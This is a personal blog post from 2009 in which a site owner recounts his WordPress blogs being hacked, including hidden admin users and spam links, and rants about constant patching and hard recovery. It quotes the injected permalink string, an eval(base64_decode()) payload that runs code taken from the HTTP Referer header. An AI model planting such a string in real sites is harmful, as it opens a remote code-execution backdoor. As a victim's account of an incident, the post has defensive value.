ERIC SHEFFERMAN <DOT> COM

Blog-o-Goodness

WordPress Security Exploits – This site was hacked

I still have no idea what this means.

I’m currently running WordPress 2.8.4 on this site.

One of my older sites was hacked as per

http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

and the permalinks were changed to

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.

I used WordPress Exploit Scanner and found one post had a bunch of stuff (spam links) in it. Fortunately I had revisions on (don’t even remember that was set that way) and I was able to get back the original version of the post.

I exported the database as an XML file and poked around and it looks like the safest thing would be to look through the data exported and then import the data into a totally fresh WordPress install.

Icky, but I guess that’ll get me to work on the site again. I’d like to use the modified theme I made for it, so I’m probably going to have to compare the theme to a safe copy line by line to make sure there isn’t any stuff added to the php.

Installing all the plugins and the settings is going to be a LOT of work. All the analytics things, etc. that need their own Google ID, Yahoo ID, etc.

OK — but now to this blog here — it’s been running the most updated WordPress. I clicked on the users list and the same thing… a user named WordPress that disappears. So I messed around until I deleted the user (see the link below for that info — I wound up first deleting all the users other than me since I’m the only user (no idea how/why there were so many others) — I then had to ADD a user, then use the URL from the edit button for that user but modify the URL until I hit upon the URL with the ID number of the hidden “WordPress” named user so that I could delete it).

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

I can’t SEE any evidence of other problems — this blog didn’t even have its permalinks changed (I don’t know if that’s a big deal or not, since everything else I’ve seen about this exploit identifies it by the change in the permalinks). So there’s no way for me to know what else was done to this blog. But this one has a lot more stuff on it and the last thing I’d want to do is try to export the data a re-create it all. Even more plugins etc. to configure.

On the other hand, I have no idea if the google adsense code being displayed is even crediting my account now. There’s a “harmless” way to create a huge revenue-generating exploit. How long would it take before it was really noticed that all the adsense revenue from millions of blogs was being siphoned? Google would notice, but how long would it take individual blog owners to catch on?

Which leaves me at – I have no idea what to do next.

Even if I survive this exploit, this suggests that if a website is being run as software (as opposed to plain html files) then one needs to be on the lookout DAILY for new security updates, etc. That doesn’t leave a lot of room for say… taking a day AWAY from the damn computer.

– – –

Further thoughts:

This really makes WordPress a burden — I have way too many sites running WordPress to have to perform this kind of maintenance at a moments notice. I think a solution would be automatic upgrades. While I’m not a fan of the concept of “automatic” — the hackers are doing these attacks in an automated way. As a mere human, I can’t always be ready at 3am because that’s when some attack script decided it was time to attack my site.  At least then there’s a chance my site would automatically update before the hacker hits it. The worst case is the automatic upgrade breaks my site — but that’s no worse than the hacker breaking my site. And probably at least it’s a known quantity. Right now I still have no way of knowing if that extra user in this site was a symptom of a worse attack or was the sum total of the attack.

Checking my emails — even though this site had a user added, I received no email about the user being added. My other site that was completely hacked I did receive an email on September 1:

New user registration on your blog <BLOG NAME REMOVED>:
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com

searching for this email address I found these links

http://www.emintelligencer.org.uk/2009/09/02/spam-hack-attack/

http://www.packcamera.com/archives/409

http://mice.org/blog/an-open-note-to-wordpress-spammers-hackers/

But just knowing that I’ve now removed the user means NOTHING. There could be malicious code added ANYWHERE and I’d have no way of knowing. Worst of all, it could be added in the theme — which I’ve customized.

And that’s what brings me to the rant. So many themes force the user to modify the code — even if it’s just a simple thing to change the header graphic. This makes updating the theme a pain since it’s necessary to figure out how to redo all those modifications each time. Since I have no way of knowing if the theme has been corrupted, I have to start from scratch again modifying a theme.

It’s a computer! Why hard-code things like header graphics when it’s so easy to make that an option the user can select on a control panel? So many little options like that would eliminate the need for hand-adjusting a theme.

I’m also realizing now that things that aren’t saved include stuff like all the sidebar widgets settings and how they are laid out — things that are very manual labor to set right again. So even though I have the text, getting the blog to look like itself will be hours of labor.

And this hours of labor is multiplied by the number of sites affected. That is why I think it needs to be the WordPress software itself that does the protection and auto updating. I can’t do this across every site I’ve built for myself AND other people. There’s too many sites.

I’d also like to see some way of “locking” a WordPress site. Some sites are done in WordPress for convenience — getting a pretty linking structure, being able to add on component later, getting a quick “professional” look by just adding a nice theme — but these are STATIC sites. They aren’t being updated, they aren’t being blogged on, they could just as well have been plain HTML except that I have no good software for designing a plain HTML site. Why can’t I just lock these sites in some way instead of leaving them open to a user being adding and being hacked? The site that’s my big problem right now is one that I haven’t updated at all in 2009. So it really could have been plain HTML for all I needed. But now it is going to be a major project. All because WordPress continued to be active and interactive even though I had no need for it to be so.

Oh — and this site? I really have no idea how to tell if it was really hacked, if the mysteriously added user was just SOME OTHER exploit, or what. And much as I’ve read, most of it says that I should just be checking every day for WordPress updates and maintaining the blog. That turns this blog into a full-time 24/7 with no vacation job. That just can’t be worth it.

And still doesn’t answer the question: Is this site exploited or not? How would I know until it REALLY shows some problem? And by then, of course, it’s too late.

I am tired.

– – –

Update September 7, 2009

So here’s a post on WordPress.org telling people to upgrade immediately:

HACK WARNING: UPGRADE IMMEDIATELY
http://wordpress.org/support/topic/307660

Here’s the upgrade release telling people to update to version 2.8.4

http://wordpress.org/development/2009/08/2-8-4-security-release/

It says:

WordPress 2.8.4: Security Release

Posted August 12, 2009 by Matt. Filed under Releases, Security.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

  Um. I’m thinking that this somehow did allow remote access and that this was possible an extreme understatement of the problem. I have no idea still how many websites of mine are compromised AND no idea how severe the compromises are. But having to reinstall a fresh WordPress and then reimport exported data and then attempt to get the whole look-and-feel of the blogs back to where they were is potentially a LOT of pointing and clicking.

So I could have POSSIBLY prevented this problem IF I had seen the security release notice (I am SUPPOSED TO be checking for security updates every single day as if that was my sole life purpose, right?) and acted right away to update EVERY SINGLE WordPress site I ever developed for myself or someone else.

Yeah.

Here’s two support forum posts on the topic.

Question About Possible Hack of Site
http://wordpress.org/support/topic/307518

WP adding code to the end of url links breaking them
http://wordpress.org/support/topic/297639

These are the best info I’ve found on this, and yet they don’t give very concrete info.

My thoughts:

This is an AUTOMATED attack. It’s not some dude staying up late working on attacking blogs one at a time. This is some software running that is attacking blogs as fast as a computer can. That’s why big important sites are being hit and stupid sites and abandoned sites — the software doesn’t care.

No one has suggested exactly what the hack did, is doing, where it left back doors for future attacks, etc.
http://wordpress.org/support/topic/297639/page/2
There’s a post suggesting that bogus admin accounts were created on a WordPress 2.8.4 install without the permalinks being messed up (like what happened here at ericshefferman.com). I think that once you’ve got an admin account you can access through the edit functions on WordPress the plugin code, the theme code, and all sorts of other stuff — so just because the permalinks weren’t messed up doesn’t mean that there isn’t all sorts of bad stuff hidden on the site. JUST BECAUSE THE FAN ISN’T TURNED ON, DOESN’T MEAN THAT THERE’S NO FECES ALREADY ON THE FAN BLADES. Again, it’s not a person who is doing this — software can patiently screw with just one obscure file on millions of websites one-at-a-time. And probably do all that in seconds anyway. And just because the stuff was done now doesn’t mean it has to reveal itself immediately — it could be waiting for 9/11 or 12/12/2012 or who knows when.

I love the posts from programming snobs like can be found here
http://wordpress.org/support/topic/307518/page/5
Where someone is talking about how version 2.8.4 is the latest so that’s where the focus should be.
My last post on this blog was on May 10, 2009 — a bit before the Security Update Notice. As Steve Martin would say, EXCUSE ME.

This is the type of thinking that I can’t stand:

folks, you can’t upgrade “just once a year” because you “feel like it,” if you want the max protection available at any given time from WordPress. it IS your fault if you don’t/can’t/won’t keep your installs current – whether you do them yourselves or pay someone to do them.

it’s just laziness, not to upgrade, compounded by a lack of knowledge. btw, i have about 9 blogs. they all get upgraded when there’s a WP upgrade. is it a pita? yeah, kinda. but the whole thing is done in less than an hour – a small price to pay for keeping installs as safe as possible.

Yep. It is a menial task. A person probably can upgrade 9 blogs in about an hour. Probably a even person who makes minimum wage or less. WHICH MEANS IT’S A TASK THAT SHOULD BE DONE BY A COMPUTER. Because a computer doesn’t mind spinning its wheels at 3am to deal with the latest security issue right away — whereas I’d rather be SLEEPING.

That’s why I think that WordPress might as well just automatically update itself. Though auto-updates might occasionally screw things up, that’s gotta be better than the alternative — which is me checking constantly EVERY DAY (and probably multiple times throughout the day) to see if there’s a WordPress security update. Because if there is an exploit, it is going to be rolled out and hit vulnerable sites with a speed and accuracy that can only be achieved by computer.

The argument that a person can update 9 blogs in an hour is absurd. How many blogs can some hacker SOFTWARE exploit in an hour? Thousands? Is is it more like hundreds of thousands?

 AND it brings me to
http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/

which says:

The same attacked happend to one of my WordPress blogs that has the latest 2.8.4 version on it so I don’t think upgrading to latest version will help prevent this attack from happening to you (but highly recommended to run latest WordPress version anyway).

Which is what I think happened here at ericshefferman.com. So even claiming I’m at fault for the non-updated blog doesn’t help with the blog that’s hacked running 2.8.4.

Although I didn’t have any of the permalink isssues on this blog, the fact that someone was able to create an admin account means that they had access to modify all sorts of stuff. And it only takes one little bit of php code left in some file for them to re-hack anytime they want to.

This rapidly gets too complex and it’s past 3am.

Have I Been Hacked? “WE DID 0 QUERIES” suddenly in footer
http://wordpress.org/support/topic/305941

Hmm – this search:

http://www.google.com/search?hl=en&q=%22WE+DID+0+QUERIES%22&btnG=Search

gets “Results 1 – 10 of about 11,000 for “WE DID 0 QUERIES”. (0.06 seconds)”

So is the solution to say that there are about 11,000 webmasters who are idiots?

Or maybe this stuff is just getting way complex. It’s not like I’d ever have the time to personally READ every line of code that makes up a WordPress site, much less attempt to comprehend it all.

This reminds me of what I was thinking about this afternoon – when I was first looking into using blog software (a LONG time ago), I came across blosxom and what I liked about it was the idea that you could run the software on your computer and generate your entire blog, and then upload it all to your webserver as static HTML. No hacking possible.

http://www.blosxom.com/documentation/users/configure/static.html

– – –

Update – after 5 hours of sleep

If any of the above seems rambling or outrageous, it was written with very little sleep and very lots of frustration.

I just changed the database password on this site, but wonder about the effectiveness at this point. A user with admin access could have used the theme editor or plugin editor to leave backdoor code in any file on the site. Since they were able to add the first admin without me receiving an email notice of the event, they ought to be able to add another.

Some of the advice in other blog posts about this seems to be a little off. I now realize that using phpMyAdmin on my web host to look at the wp_users table would have told me the date the  fake admin was added to the system. I could then presume that database backups from before this date were “safer”. Since I was only looking at the Authors & Users setting within WordPress when I deleted the user, that information was not available to me.

I use the plugins WP-DBManager and WordPress Backup (by BTE) to email myself weekly backups (plenty often for a website I update a few times a month). I think (but don’t know) that by using these backups I could reproduce most of the site (except for some old things that I used to add content that I didn’t put their files in the Uploads directory since I didn’t know about these plugins at the time). However, I have no idea how far back I’d need to look at the backups (though I suspect anything before August was probably safe).

There doesn’t seem to be much good information on this at WordPress.org. The feeling I get is that it’s my fault for not updating my software sooner — which is really saying that it’s my fault for using WordPress at all.

At this point I really have to wonder what DYNAMIC features of WordPress I need. Much like I was saying about Bloxsom, I could run WordPress on a local computer and then use spidering software here to get copies of every generated HTML page of the site and then just ftp all those HTML pages as a static site to my server the few times a month I write an update. The only major thing I can think of that would be missing is search, but I could just implement a google search instead of a WordPress search.

Share

Category: Security, WordPress

Tagged: , ,

One Response

  1. Hi! I noticed the ping back to my article and thought I’d drop by and read your post. I may have some answers for you but they are way to lengthy to get into on your comments. I believe you can see my e-mail address when you moderate this comment. If so, please contact me via e-mail to discuss this. I will be more than happy to help you out. And thank you again for linking to my post!

    Debbie Mahler
    MICE Training, Technology & Education

Leave a Reply

Resource

Thoughts

So much of life, it seems to me, is determined by pure randomness. - Sidney Poitier

Keep Up With
Eric Shefferman

Via RSS
    

Via Email Updates
Name:
Email:

Categories

Archives

The following link is not for people: I do not like it, Sam I Am.